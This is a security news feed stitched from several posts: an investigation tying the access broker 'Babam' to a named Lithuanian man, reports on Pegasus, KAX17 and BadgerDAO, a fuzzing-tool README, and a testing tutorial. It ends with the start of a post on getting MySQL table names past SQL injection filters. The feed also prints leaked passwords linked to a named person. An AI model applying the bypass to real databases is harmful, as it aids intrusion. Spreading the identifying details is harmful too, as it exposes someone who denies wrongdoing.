
Who Is the Network Access Broker ‘Babam’?

3 December 2021 at 21:53

Rarely do cybercriminal gangs that deploy ransomware gain the initial access to the target themselves. More commonly, that access is purchased from a cybercriminal broker who specializes in acquiring remote access credentials — such as usernames and passwords needed to remotely connect to the target’s network. In this post we’ll look at the clues left behind by “Babam,” the handle chosen by a cybercriminal who has sold such access to ransomware groups on many occasions over the past few years.

Since the beginning of 2020, Babam has set up numerous auctions on the Russian-language cybercrime forum Exploit, mainly selling virtual private networking (VPN) credentials stolen from various companies. Babam has authored more than 270 posts since joining Exploit in 2015, including dozens of sales threads. However, none of Babam’s posts on Exploit include any personal information or clues about his identity.

But in February 2016, Babam joined Verified, another Russian-language crime forum. Verified was hacked at least twice in the past five years, and its user database posted online. That information shows that Babam joined Verified using the email address “[email protected].” The latest Verified leak also exposed private messages exchanged by forum members, including more than 800 private messages that Babam sent or received on the forum over the years.

In early 2017, Babam confided to another Verified user via private message that he is from Lithuania. In virtually all of his forum posts and private messages, Babam can be seen communicating in transliterated Russian rather than by using the Cyrillic alphabet. This is common among cybercriminal actors for whom Russian is not their native tongue.

Cyber intelligence platform Constella Intelligence told KrebsOnSecurity that the [email protected] address was used in 2016 to register an account at filmai.in, which is a movie streaming service catering to Lithuanian speakers. The username associated with that account was “bo3dom.”

A reverse WHOIS search via DomainTools.com says [email protected] was used to register two domain names: bonnjoeder[.]com back in 2011, and sanjulianhotels[.]com (2017). It’s unclear whether these domains ever were online, but the street address on both records was “24 Brondeg St.” in the United Kingdom. [Full disclosure: DomainTools is a frequent advertiser on this website.]

A reverse search at DomainTools on “24 Brondeg St.” reveals one other domain: wwwecardone[.]com. The use of domains that begin with “www” is fairly common among phishers, as well as among passive “typosquatting” sites that seek to siphon credentials from legitimate websites when people mistype a domain, for example by omitting the “.” after typing “www”.

A banner from the homepage of the Russian language cybercrime forum Verified.

Searching DomainTools for the phone number in the WHOIS records for wwwecardone[.]com  — +44.0774829141 — leads to a handful of similar typosquatting domains, including wwwebuygold[.]com and wwwpexpay[.]com. A different UK phone number in a more recent record for the wwwebuygold[.]com domain — 44.0472882112 — is tied to two more domains – howtounlockiphonefree[.]com, and portalsagepay[.]com. All of these domains date back to between 2012 and 2013.

The original registration records for the iPhone, Sagepay and Gold domains share an email address: [email protected]. A search on the username “bo3dom” using Constella’s service reveals an account at ipmart-forum.com, a now-defunct forum concerned with IT products, such as mobile devices, computers and online gaming. That search shows the user bo3dom registered at ipmart-forum.com with the email address [email protected], and from an Internet address in Vilnius, Lithuania.

[email protected] was used to register multiple domains, including wwwsuperchange.ru back in 2008 (notice again the suspect “www” as part of the domain name). Gmail’s password recovery function says the backup email address for [email protected] is bo3*******@gmail.com. Gmail accepts the address [email protected] as the recovery email for that devrian27 account.

According to Constella, the [email protected] address was exposed in multiple data breaches over the years, and in each case it used one of two passwords: “lebeda1” and “a123456“.

Searching in Constella for accounts using those passwords reveals a slew of additional “bo3dom” email addresses, including [email protected].  Pivoting on that address in Constella reveals that someone with the name Vytautas Mockus used it to register an account at mindjolt.com, a site featuring dozens of simple puzzle games that visitors can play online.

At some point, mindjolt.com apparently also was hacked, because a copy of its database at Constella says the [email protected] used two passwords at that site: lebeda1 and a123456.

A reverse WHOIS search on “Vytautas Mockus” at DomainTools shows the email address [email protected] was used in 2010 to register the domain name perfectmoney[.]co. This is one character off of perfectmoney[.]com, which is an early virtual currency that was quite popular with cybercriminals at the time. The phone number tied to that domain registration was “86.7273687“.

A Google search for “Vytautas Mockus” says there’s a person by that name who runs a mobile food service company in Lithuania called “Palvisa.” A report on Palvisa (PDF) purchased from Rekvizitai.vz — an official online directory of Lithuanian companies — says Palvisa was established in 2011 by a Vytautas Mockus, using the phone number 86.7273687 and the email address [email protected]. The report states that Palvisa is active, but has had no employees other than its founder.

Reached via the [email protected] address, the 36-year-old Mr. Mockus expressed mystification as to how his personal information wound up in so many records. “I am not involved in any crime,” Mockus wrote in reply.

A rough mind map of the connections mentioned in this story.

The domains apparently registered by Babam over nearly 10 years suggest he started off mainly stealing from other cybercrooks. By 2015, Babam was heavily into “carding,” the sale and use of stolen payment card data. By 2020, he’d shifted his focus almost entirely to selling access to companies.

A profile produced by threat intelligence firm Flashpoint says Babam has received at least four positive feedback reviews on the Exploit cybercrime forum from crooks associated with the LockBit ransomware gang.

The ransomware collective LockBit giving Babam positive feedback for selling access to different victim organizations. Image: Flashpoint

According to Flashpoint, in April 2021 Babam advertised the sale of Citrix credentials for an international company that is active in the field of laboratory testing, inspection and certification, and that has more than $5 billion in annual revenues and more than 78,000 employees.

Flashpoint says Babam initially announced he’d sold the access, but later reopened the auction because the prospective buyer backed out of the deal. Several days later, Babam reposted the auction, adding more information about the depth of the illicit access and lowering his asking price. The access sold less than 24 hours later.

“Based on the provided statistics and sensitive source reporting, Flashpoint analysts assess with high confidence that the compromised organization was likely Bureau Veritas, an organization headquartered in France that operates in a variety of sectors,” the company concluded.

In November, Bureau Veritas acknowledged that it shut down its network in response to a cyber attack. The company hasn’t said whether the incident involved ransomware and if so what strain of ransomware, but its response to the incident is straight out of the playbook for responding to ransomware attacks. Bureau Veritas has not yet responded to requests for comment; its latest public statement on Dec. 2 provides no additional details about the cause of the incident.

Flashpoint notes that Babam’s use of transliterated Russian persists on both Exploit and Verified until around March 2020, when he switches over to using mostly Cyrillic in his forum comments and sales threads. Flashpoint said this could be an indication that a different person began using the Babam account at that point, or, more likely, that Babam had only a tenuous grasp of Russian to begin with and that his language skills and confidence improved over time.

Lending credence to the latter theory is that Babam still makes linguistic errors in his postings that suggest Russian is not his original language, Flashpoint found.

“The use of double “n” in such words as “проданно” (correct – продано) and “сделанны” (correct – сделаны) by the threat actor proves that this style of writing is not possible when using machine translation since this would not be the correct spelling of the word,” Flashpoint analysts wrote.

“These types of grammatical errors are often found among people who did not receive sufficient education at school or if Russian is their second language,” the analysis continues. “In such cases, when someone tries to spell a word correctly, then by accident or unknowingly, they overdo the spelling and make these types of mistakes. At the same time, colloquial speech can be fluent or even native. This is often typical for a person who comes from the former Soviet Union states.”

NSO Group spyware used to compromise iPhones of 9 US State Dept officials

3 December 2021 at 21:17

Apple warns that the mobile devices of at least nine US Department of State employees were compromised with NSO Group’s Pegasus spyware.

The iPhones of at least nine US state department officials were compromised with the NSO Group’s spyware Pegasus.

The US officials targeted by the surveillance software were either based in Uganda or focused on matters concerning the African country, Reuters revealed, though it was not able to determine which NSO client orchestrated the attacks.

“Apple Inc iPhones of at least nine U.S. State Department employees were hacked by an unknown assailant using sophisticated spyware developed by the Israel-based NSO Group, according to four people familiar with the matter.” reads the post published by Reuters. “The intrusions, first reported here, represent the widest known hacks of U.S. officials through NSO technology.”

NSO Group told Reuters that it is not aware of the tools used in the attacks and that it has canceled the relevant customer accounts; it nonetheless declared that it will investigate the incidents. NSO Group added that once the surveillance spyware is sold to a customer, it cannot know whom that customer targets.

NSO announced that it will cooperate with any relevant government authority to track down the attackers.

“If our investigation shall show these actions indeed happened with NSO’s tools, such customer will be terminated permanently and legal actions will take place,” said an NSO spokesperson, who added that NSO will also “cooperate with any relevant government authority and present the full information we will have.”

In early November, the U.S. sanctioned four companies, including NSO Group, for the development of surveillance malware or the sale of hacking tools used by nation-state actors. NSO Group and Candiru are being sanctioned for the development and sale of surveillance software used to spy on journalists and activists.

In November, Apple sued NSO Group and its parent company Q Cyber Technologies in a U.S. federal court for illegally targeting its customers with the surveillance spyware Pegasus.

According to the lawsuit, the surveillance firm is accountable for hacking into Apple’s iOS-based devices using zero-click exploits. The software developed by the surveillance firm was used to spy on activists, journalists, researchers, and government officials.

Apple also announced it would contribute $10 million to academic research aimed at unmasking illegal surveillance activities.

“Apple today filed a lawsuit against NSO Group and its parent company to hold it accountable for the surveillance and targeting of Apple users. The complaint provides new information on how NSO Group infected victims’ devices with its Pegasus spyware. To prevent further abuse and harm to its users, Apple is also seeking a permanent injunction to ban NSO Group from using any Apple software, services, or devices.” reads the announcement published by Apple.

The legal action aims at permanently preventing the infamous company from breaking into any Apple software, services, or devices.

Pierluigi Paganini

IDA2Obj - Static Binary Instrumentation

3 December 2021 at 20:30
By: Zion3R


IDA2Obj is a tool to implement SBI (Static Binary Instrumentation).

The working flow is simple:

  • Dump object files (COFF) directly from one executable binary.
  • Link the object files into a new binary, almost the same as the old one.
  • During the dumping process, you can insert any data/code at any location.
    • SBI is just one of the usage scenarios, especially useful for black-box fuzzing.

How to use

  1. Prepare the environment:

    • Set AUTOIMPORT_COMPAT_IDA695 = YES in the idapython.cfg to support the API with old IDA 6.x style.
    • Install dependency: pip install cough
  2. Create a folder as the workspace.

  3. Copy the target binary which you want to fuzz into the workspace.

  4. Load the binary into IDA Pro, choosing Load resources and Manual load so that all the segments from the binary are loaded.

  5. Wait for the auto-analysis to finish.

  6. Dump object files by running the script MagicIDA/main.py.

    • The output object files will be inside ${workspace}/${module}/objs/afl.
    • If you create an empty file named TRACE_MODE inside the workspace, then the output object files will be inside ${workspace}/${module}/objs/trace.
    • By the way, it will also generate 3 files inside ${workspace}/${module} :
      • exports_afl.def (used for linking)
      • exports_trace.def (used for linking)
      • hint.txt (used for patching)
  7. Generate lib files by running the script utils/LibImports.py.

    • The output lib files will be inside ${workspace}/${module}/libs, used for linking later.
  8. Open a terminal and change the directory to the workspace.

  9. Link all the object files and lib files by using utils/link.bat (steps 9 and 10 can also be scripted; see the sketch after this list).

    • e.g. utils/link.bat GdiPlus dll afl /RELEASE
    • It will generate the new binary with the pdb file inside ${workspace}/${module}.
  10. Patch the new built binary by using utils/PatchPEHeader.py.

    • e.g. utils/PatchPEHeader.py GdiPlus/GdiPlus.afl.dll
    • For the first time, you may need to run utils/register_msdia_run_as_administrator.bat as administrator.
  11. Run & Fuzz.
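The linking and patching steps can also be driven from a script. Below is a minimal Python sketch of steps 9 and 10 for the GdiPlus example used above; the workspace path is an assumption, and the relative utils paths follow the examples in this README.

import subprocess
from pathlib import Path

# Hedged sketch of steps 9-10; the workspace path and module name are assumptions.
workspace = Path(r"C:\fuzz\workspace")
module, kind, flavor = "GdiPlus", "dll", "afl"

# Step 9: link the dumped object files and import libs into a new binary.
subprocess.run(["cmd", "/c", r"utils\link.bat", module, kind, flavor, "/RELEASE"],
               cwd=workspace, check=True)

# Step 10: patch the PE header of the rebuilt binary.
rebuilt = Path(module) / f"{module}.{flavor}.{kind}"
subprocess.run(["python", r"utils\PatchPEHeader.py", str(rebuilt)],
               cwd=workspace, check=True)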

More details

HITB Slides : https://github.com/jhftss/jhftss.github.io/blob/main/res/slides/HITB2021SIN%20-%20IDA2Obj%20-%20Mickey%20Jin.pdf

Demo : https://drive.google.com/file/d/1N3DXJCts5jG0Y5B92CrJOTIHedWyEQKr/view?usp=sharing



Threat Roundup for November 26 to December 3

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 26 and Dec. 3. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Talos Takes Ep. #79: Emotet's back with the worst type of holiday present

3 December 2021 at 15:46
By Jon Munshaw. The latest episode of Talos Takes is available now. Download this episode and subscribe to Talos Takes using the buttons below, or visit the Talos Takes page. Emotet is back, and it brought the worst possible holiday present (just in time for peak spam season, too!). We...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays

3 December 2021 at 15:33

Since 2017, an unknown threat actor has run thousands of malicious Tor relay servers in the attempt to unmask Tor users.

A mysterious threat actor, tracked as KAX17, has run thousands of malicious Tor relay servers since 2017 in an attempt to deanonymize Tor users.

KAX17 ran relay servers in various positions within the Tor network, including entry and exit nodes. Researchers at the Tor Project removed hundreds of servers set up by the threat actor in October and November 2021.

In August 2020, the security researcher who goes by the moniker Nusenu revealed that in May 2020 a threat actor managed to control roughly 23% of the entire Tor network’s exit nodes. Experts warned that this was the first time a single actor had controlled such a large number of Tor exit nodes. A Tor exit relay is the final relay that Tor traffic passes through before it reaches the intended destination; because traffic exits through these relays, the IP address of the exit relay is interpreted as the source of the traffic. Tor exit relays advertise their presence to the entire Tor network, so they can be used by any Tor user.

By controlling these relays, it is possible to see which websites a user connects to and, if an insecure connection is used, to manipulate traffic. In May 2020, the threat actor managed to control over 380 Tor exit nodes, with a peak on May 22, when it controlled 23.95% of Tor exit relays.

Nusenu told The Record that they have observed a resurgence of the phenomenon, associated with the same attacker.

“But a security researcher and Tor node operator going by Nusenu told The Record this week that it observed a pattern in some of these Tor relays with no contact information, which he first noticed in 2019 and has eventually traced back as far as 2017.” reads the post published by The Record. “Grouping these servers under the KAX17 umbrella, Nusenu says this threat actor has constantly added servers with no contact details to the Tor network in industrial quantities, operating servers in the realm of hundreds at any given point.”

Most of the Tor relay servers set up by the KAX17 actor were located in data centers all over the world and were configured primarily as entry and middle points. Nusenu pointed out that, unlike other threat actors they analyzed in the past, the KAX17 group operates only a small number of exit points.

This circumstance suggests that the group is operating to track Tor users within the anonymizing network. Nusenu also believes that KAX17 is an APT group.

Below are some insights on the KAX17 profile provided by the researcher in a post:

  • active since at least 2017
  • sophistication: non-amateur level and persistent
  • uses large amounts of servers across many (>50) autonomous systems (including non-cheap cloud hosters like Microsoft)
  • operated relay types: mainly non-exit relays (entry guards and middle relays) and to a lesser extent Tor exit relays
  • (known) concurrently running relays peak: >900 relays
  • (known) advertised bandwidth capacity peak: 155 Gbit/s
  • (known) probability to use KAX17 as first hop (guard) peak: 16%
  • (known) probability to use KAX17 as second hop (middle) peak: 35%
  • motivation: unknown; plausible: Sybil attack; collection of tor client and/or onion service IP addresses; deanonymization of tor users and/or onion services

The expert states that the probability of connecting through a guard relay operated by KAX17 peaked at 16%, a figure that rises to 35% for the probability of passing through one of the group’s middle relays.

“The following graph shows (known) KAX17′ network fraction in % of the entire tor network for each position (first, second and last hop of a tor circuit) over the past 3 years.”


Nusenu has been sharing these findings with the Tor Project since last year, and the Tor security experts removed all the exit relays set up by the group in October 2020. The Tor Project also removed a set of KAX17 malicious relays between October and November 2021.

The expert also states that KAX17’s poor OpSec revealed the use of an email address in a relay’s ContactInfo field, but it is impossible to determine its authenticity, and we cannot exclude that it is a false flag.

“Detecting and removing malicious tor relays from the network has become an impractical problem to solve. We presented a design and proof of concept implementation towards better self-defense options for tor clients to reduce their risk from malicious relays without requiring their detection.” concludes the researcher.

Pierluigi Paganini

End-to-end Testing: How a Modular Testing Model Increases Efficiency and Scalability

3 December 2021 at 09:00

In our last post, Testing Data Flows using Python and Remote Functions, we discussed how organizations can use remote functions in Python to create an end-to-end testing and validation strategy. Here we build on that concept and discuss how it is possible to design the code to be more flexible.  

For our purposes, flexible code means two things:

  1. Writing the code in such a way that most of it can be reused
  2. Creating a pool of functionalities that can be combined to create tests that are bigger and more complex.
What is a flow?
A flow is any unique complex sequence of steps and interactions that is independently testable.
Flows can mimic business or functional requirements.
Flows can be combined in any way between themselves to create higher level or specific flows.

The Need to Update the Classic Testing View

A classical testing view is defined by a sequence of steps that do a particular action on the system. This typically contains:

  • A setup, which prepares the test environment for the actual test, e.g. creating users, populating data into a DB, etc.
  • A series of actions that modify the current state of the system and check the outcome of the performed actions
  • A teardown that returns the system to its initial state before the test

Each of these actions is separate but dependent on the others. This means that for each test, we can assume that the setup has run successfully and, in the end, that the teardown has run to clean it up. In complex test scenarios this can become cumbersome and difficult to orchestrate or reuse.

In a classical testing model, unless the developer writes helpers that are used inside the test, the code typically cannot be reused to build other tests. In addition, when helpers are written, they tend to be specific to certain use cases and scenarios, making them irrelevant in most other situations. On the other hand, some helpers are so generic that they will still require the implementation of additional logic when using them with certain test data.

Finally, using test-centric development means that many test sequences or test scenario steps must be rewritten every time you need them in different combinations of functionality and test data.
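For contrast, here is a minimal sketch of what the classical model above typically looks like in code (the scenario and names are purely illustrative):

import unittest

class TestUserProfile(unittest.TestCase):
    def setUp(self):
        # Setup: prepare the test environment (an in-memory stand-in here).
        self.db = {"users": {"u1": {"name": "test-user"}}}

    def tearDown(self):
        # Teardown: return the system to its initial state.
        self.db["users"].clear()

    def test_user_can_be_renamed(self):
        # Action: modify the current state of the system.
        self.db["users"]["u1"]["name"] = "renamed-user"
        # Check: validate the outcome of the performed action.
        self.assertEqual(self.db["users"]["u1"]["name"], "renamed-user")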

CrowdStrike’s Approach: A Modular Testing Model

To avoid these issues, we take a modularized approach to testing. You can imagine each test component as a Lego block, wherein each piece can be made to fit together in order to create something bigger or more complex. 

These flows can map to a specific functionality and should be atomic. As more complex architectures are built, unless the functionality has changed, you don’t need to rewrite existing functions to fit. Rather, you can combine them to follow business context and business use cases. 

The second part of our approach relates to functional programming, which means we create independent testable functions. We can then separate data into payloads to functions, making them easy to process in parallel.
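Because a flow only depends on the payload it receives, the same list of simulated hosts can be split into chunks and pushed through a flow concurrently. The sketch below assumes the flow functions defined later in this post:

from concurrent.futures import ThreadPoolExecutor

def run_flow_in_parallel(flow, simulated_hosts, workers=4):
    # Each chunk is an independent payload, so the flow needs no shared state.
    chunks = [simulated_hosts[i::workers] for i in range(workers)]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        list(pool.map(flow, chunks))

# e.g. run_flow_in_parallel(flow_agent_ready_for_cloud, hosts)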

Business Case: A Product That Identifies Security Vulnerabilities

To illustrate this point, let’s take a business use case for a product that identifies vulnerabilities in certain applications installed on a PC. The evaluation is based on information about supported installed applications sent by agents installed on the PCs. This information could include the name of the application, the installed version and the architecture (32- or 64-bit). This use case dictates that if a computer is online, the agent will send all relevant information to the cloud, where it is processed and evaluated against a publicly available DB of vulnerabilities (NVD). (If you are unfamiliar with common vulnerabilities and exposures, or CVE, learn more here.)

Our testing flows will be designed around the actual product and business flows. You can see below a basic diagram of the architecture for this proposed product.

You can see the following highlights from the diagram above:

  • A database of profiles for different versions of OS and application to be able to cover a wide range of configurations 
  • An orchestrator for the tests, called the Test Controller, with the following functionalities:
    • Algorithm for selecting datasets based on the particularities of the scenario it has to run
    • Support for creating constructs for the simulated data. 
    • Constructs that will be used to create our expected data in order to do our validations post-processing

There is a special section for generating and sending data points to the cloud. This can be distributed and every simulated agent can be run in parallel and scaled horizontally to cover performance use cases.

Interaction with post-processed data is done through internal and external flows each with their own capabilities and access to data through auto-generated REST/GRPC clients.

Below you can see a diagram of the flows designed to test the product and interaction between them.

A closer look at the flows diagram and code

Flows are organized into separate packages based on actual business needs. They can be differentiated into public and internal flows. A general rule of thumb is that public flows can be used to design test scenarios, whereas internal flows should only be used as helpers inside other flows. Public flows should always implement the same parameters, which are the structures for test data (in our case, the simulated hosts and the services).

# Build Simulated Hosts/Services Constructs

In this example all data is stored in a simulated host construct. This is created at the beginning of the test based on meaningful data selection algorithms and encapsulates data relevant to the test executed, which may relate to a particular combination of OS or application data.

from dataclasses import dataclass
from typing import List

import agent_primitives
# Assumption: ArchitectureEnum is defined alongside the agent primitives.
from agent_primitives import ArchitectureEnum

from api_helpers import VulnerabilitiesDbApiHelperRest, InternalVulnerabilitiesApiHelperGrpc, ExternalVulnerabilitiesApiHelperRest

@dataclass
class TestDataApp:
   name: str
   version: str
   architecture: str
   vendor: str


@dataclass
class TestDataDevice:
   architecture: ArchitectureEnum
   os_version: str
   kernel: str


@dataclass
class TestDataProfile:
   app: TestDataApp
   device: TestDataDevice


@dataclass
class SimulatedHost:
   id: str
   device: TestDataDevice
   apps: List[TestDataApp]
   agent: agent_primitives.SimulatedAgent


def flow_build_test_data(profile: TestDataProfile, count: int) -> List[SimulatedHost]:
   # get_test_data_from_s3 is the data-selection helper: it pulls `count`
   # device/app configurations matching the requested profile.
   test_data_configurations = get_test_data_from_s3(profile, count)
   simulated_hosts = []
   for configuration in test_data_configurations:
       agent = agent_primitives.get_simulated_agent(configuration)
       host = SimulatedHost(id=configuration.get('id'),
                            device=configuration.get('device'),
                            apps=[TestDataApp(**app) for app in configuration.get('apps')],
                            agent=agent)
       simulated_hosts.append(host)
   return simulated_hosts

Once the Simulated Host construct is created, it can be passed to any public flows that accept that construct. This will be our container of test data to be used in all other testing flows. 

In case you need to mutate states or other information related to that construct, any particular flow can return the host’s constructs to be used by another higher-level flow.

The TestServices construct encompasses all the REST/GRPC service clients needed to interact with cloud services to perform queries, fetch post-processing data, etc. It is initialized once and passed around wherever it is needed.

@dataclass
class TestServices:
   vulnerabilities_db_api: VulnerabilitiesDbApiHelperRest
   internal_vulnerabilities_api: InternalVulnerabilitiesApiHelperGrpc
   external_vulnerabilities_api: ExternalVulnerabilitiesApiHelperRest

Function + data constructs = flow. Separating data from functionality is crucial in this approach. It lets the same function work with a large number of payloads that share the same structure, and it makes curating datasets much easier: the logic for selecting data for particular scenarios can be implemented independently of the function implementation.

# Agent Flows

def flow_agent_ready_for_cloud(simulated_hosts: List[SimulatedHost]):
   # Bring every simulated agent online and connected to the cloud.
   for host in simulated_hosts:
       host.agent.ping_cloud()
       host.agent.keepalive()
       host.agent.connect_to_cloud()

def flow_agent_send_device_information(simulated_hosts: List[SimulatedHost]):
   # Send the device-level attributes the cloud needs for evaluation.
   for host in simulated_hosts:
       host.agent.send_device_data(host.device.architecture)
       host.agent.send_device_data(host.device.os_version)
       host.agent.send_device_data(host.device.kernel)

def flow_agent_application_information(simulated_hosts: List[SimulatedHost]):
   # Send name and version for every installed application on the host.
   for host in simulated_hosts:
       for app in host.apps:
           host.agent.send_application_data(app.name)
           host.agent.send_application_data(app.version)
Notice how the name of each function captures its main purpose; flow_agent_send_device_information, for example, sends device information such as the architecture, OS version and kernel.

# Internal API Flows

Internal flows are mainly used to gather information from services and do validations. For validations we use a Python library called PyHamcrest and a generic validation method that compares our internal structures with the expected outcome built at the beginning of the test.

@retry(AssertionError, tries=8, delay=3, backoff=2, logger=logging)
def flow_validate_simulated_hosts_for_vulnerabilities(simulated_hosts: List[SimulatedHost], services: TestServices):
   # Build the expected outcome once, then compare it against the post-processed
   # data returned by the internal API for every simulated host.
   expected_data = build_expected_flows.evaluate_simulated_hosts_for_vulnerabilities(simulated_hosts, services)
   for host in simulated_hosts:
       actual_data = flow_get_simulated_host_vulnerabilities(host, services)
       augmented_expected = {
           "total": sum([expected_data.total_open,
                         expected_data.total_reopen,
                         expected_data.total_closed])
       }
       actual, expected, missing_fields = test_utils.create_validation_map(actual_data, [expected_data],
                                                                           augmented_expected)
       test_utils.assert_on_validation_map(host.id, actual, expected, missing_fields)


def flow_get_simulated_host_vulnerabilities(simulated_host: SimulatedHost, services: TestServices):
   response = services.internal_vulnerabilities_api.get_vulnerabilities(simulated_host)
   return validate_response_call_and_get_json(response, fail_on_errors=True)

We first use a method called create_validation_map, which takes a list of structures containing the data relevant to the actual response from the services. It normalizes all the structures and builds an actual and an expected validation map, which are then passed to the assert_on_validation_map method, where a specific PyHamcrest matcher called has_entries performs the assert.
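The actual implementations of these helpers are internal to our framework, but a rough sketch of how they might look (an assumption, not the real code) is:

from dataclasses import asdict, is_dataclass
from hamcrest import assert_that, has_entries

def create_validation_map(actual_data: dict, expected_structs: list, augmented: dict):
    # Normalize all expected structures into one flat map and note missing keys.
    expected = {}
    for struct in expected_structs:
        expected.update(asdict(struct) if is_dataclass(struct) else dict(struct))
    expected.update(augmented)
    missing_fields = [key for key in expected if key not in actual_data]
    return actual_data, expected, missing_fields

def assert_on_validation_map(label, actual, expected, missing_fields):
    # Fail fast on missing keys, then compare value by value with has_entries.
    assert not missing_fields, f"{label}: fields missing from response: {missing_fields}"
    assert_that(actual, has_entries(expected))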

The Advantages of a Modular Testing Approach 

There are several key advantages to this approach: 

  1. Increased testing versatility and simplicity. Developers are not dependent on a certain implementation because everything is unique to that function. Modules are independent and can work in any combination. The code base is independently testable. As such, if you have two flows that do the same thing, it means that one can be removed. 
  2. Improved efficiency. It is possible to “double track” most of the flows so that they can be processed in parallel. This means that they can run in any sequence and that the load can be distributed to run in a distributed infrastructure. Because there are no dependencies between the flows, you can also “parallelize” it locally to run multiple threads or multiple processes.
  3. Enhanced testing maturity. Taken together, these principles mean that developers can build more and more complex tests by reusing common elements and building on top of what exists (see the sketch after this list). Test modules can be developed in parallel because they don’t have dependencies between them. Every flow covers a small part of functionality.
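To make the reuse concrete, here is a sketch of a complete scenario composed entirely from the flows defined earlier; the profile values and the ArchitectureEnum member are illustrative assumptions:

def test_vulnerabilities_reported_for_simulated_hosts(services: TestServices):
    # Illustrative profile; real values come from the data selection algorithm.
    profile = TestDataProfile(
        app=TestDataApp(name="ExampleApp", version="1.2.3",
                        architecture="x64", vendor="Example Corp"),
        device=TestDataDevice(architecture=ArchitectureEnum.X64,
                              os_version="10.0.19044", kernel="NT"))
    hosts = flow_build_test_data(profile, count=10)            # build constructs
    flow_agent_ready_for_cloud(hosts)                          # connect agents
    flow_agent_send_device_information(hosts)                  # send device data
    flow_agent_application_information(hosts)                  # send app data
    flow_validate_simulated_hosts_for_vulnerabilities(hosts, services)  # assert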

Final Thoughts: When to Use Flow-based Testing

Flow-based testing works well in end-to-end tests for complex products and distributed architectures because it draws on best practices for writing and testing code at scale. Testing and validation have a basis in experimental science, and implementing a simulated version of the product inside the validation engine is still one of the most comprehensive ways to test the quality of a product. Flow-based testing helps reduce the complexity of building this and makes it more scalable and easier to maintain than the classical testing approach.

However, it is not ideal when testing a single service due to the complexity that exists at the beginning of the process related to data separation and creation of structures to serialize data. In those instances, the team would probably be better served by a classical testing approach. 

Finally, in complex interactions between multiple components, functionality needs to be compartmentalized in order to run it at scale. In that case, flow-based testing is one of the best approaches you can take.

When do you use flow-based testing — and what questions do you have? Sound off on our social media channels @CrowdStrike.

Researchers Detail How Pakistani Hackers Targeting Indian and Afghan Governments

3 December 2021 at 13:54
A Pakistani threat actor successfully socially engineered a number of ministries in Afghanistan and a shared government computer in India to steal sensitive Google, Twitter, and Facebook credentials from its targets and stealthily obtain access to government portals. Malwarebytes' latest findings go into detail about the new tactics and tools adopted by the APT group known as SideCopy, which is

Threat actors stole $120 M in crypto from BadgerDAO DeFi platform

3 December 2021 at 12:16

Threat actors stole $120 million in cryptocurrencies from multiple wallets connected to the decentralized finance platform BadgerDAO.

Threat actors this week have hacked the decentralized finance platform BadgerDAO and have stolen $120.3 million in crypto funds, blockchain security firm PeckShield reported. Most of the stolen funds, over $117 million, were Bitcoin, while the rest of the stolen assets were stored in the form of interest-bearing Bitcoin, a form of tokenised Bitcoin, and Ether.

BadgerDAO is a decentralised autonomous organisation (DAO) that allows users to bridge their Bitcoin into other blockchains.

Here is the current whereabouts as well as the total loss: $120.3M (with ~2.1k BTC + 151 ETH) @BadgerDAO pic.twitter.com/fJ4hJcMWTq

— PeckShield Inc. (@peckshield) December 2, 2021

The attackers were able to inject a malicious script into the UI of the BadgerDAO website, which allowed them to intercept and hijack Web3 transactions. The funds were redirected to wallets under the attackers’ control.

PeckShield was able to track the stolen funds:

Here is the list of funds that were so far transferred out from victims @BadgerDAO pic.twitter.com/P5pOj1YQ2l

— PeckShield Inc. (@peckshield) December 2, 2021

The malicious script was injected as early as November 10th, but the threat actors ran it at random intervals to avoid detection. BadgerDAO notified US and Canadian authorities and is investigating the security breach with the help of forensics firm Chainalysis.

Badger has received reports of unauthorized withdrawals of user funds.

As Badger engineers investigate this, all smart contracts have been paused to prevent further withdrawals.

Our investigation is ongoing and we will release further information as soon as possible.

— ₿adgerDAO 🦡 (@BadgerDAO) December 2, 2021

The investigation continues.

Badger has retained data forensics experts Chainalysis to explore the full scale of the incident & authorities in both the US & Canada have been informed & Badger is cooperating fully with external investigations as well as proceeding with its own.

— ₿adgerDAO 🦡 (@BadgerDAO) December 2, 2021

Once Badger discovered the unauthorized transfers, it paused all smart contracts, it also advised users to decline all transactions to addresses that are under the control of the attackers.

According to The Verge, one thing Badger is investigating is how the threat actors gained access to Cloudflare via an API key that should’ve been protected by two-factor authentication.

“While the attack didn’t reveal specific flaws within Blockchain tech itself, it managed to exploit the older “web 2.0” technology that most users need to use to perform transactions. Multi-factor authentication systems protect our accounts against many phishing schemes or bulk credential stuffing attacks. Still, experts have repeatedly warned about targeted phishing attacks that can bypass it, while toolkits to automate the process have been available for years.” reported The Verge.

“All [the] blockchain / smart contract audits in the world, and people lose 120m to a Cloudflare API leak by a sloppy team where a dude passes a new approval to his contract in the site header – GG – we still have a long way to go,” reads the comment of a user within Badger’s Discord. A member of the team said, “I’m sure we will have some mitigation procedures proposed after this.”

DeFi platforms are under attack: according to a report published by AtlasVPN in August, DeFi hacks accounted for 76% of all hacks between January and July 2021. The report states that over $129 million was stolen in DeFi attacks in 2020.

Pierluigi Paganini

Alternatives to Extract Tables and Columns from MySQL and MariaDB

27 January 2020 at 22:48

I’ve previously published a post on extracting table names when /or/i was filtered, which also blocks the word information_schema (since it contains “or”). I did some more research into this area on my own and found many other tables from which you can extract table names. These are all the databases and tables I found where we can extract table names apart from information_schema.tables. I have tested the following on MySQL 5.7.29 and MariaDB 10.3.18. There are 39 queries in total.
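If you want to quickly check which of these alternative sources are available on a given server, a small Python sketch using the mysql-connector-python package can iterate over a few of the queries listed below (connection parameters are placeholders):

import mysql.connector

# A few of the alternative sources discussed below (not the full list of 39).
QUERIES = [
    "SELECT TABLE_NAME FROM `mysql`.`innodb_table_stats` WHERE database_name = DATABASE()",
    "SELECT TABLE_NAME FROM `information_schema`.`PARTITIONS` WHERE TABLE_SCHEMA = DATABASE()",
    "SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE()",
]

conn = mysql.connector.connect(host="127.0.0.1", user="root", password="", database="security")
cur = conn.cursor()
for query in QUERIES:
    try:
        cur.execute(query)
        print(query, "->", sorted({row[0] for row in cur.fetchall()}))
    except mysql.connector.Error as err:
        # Some views only exist on newer versions or need extra privileges.
        print(query, "-> not available:", err)
conn.close()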

Sys

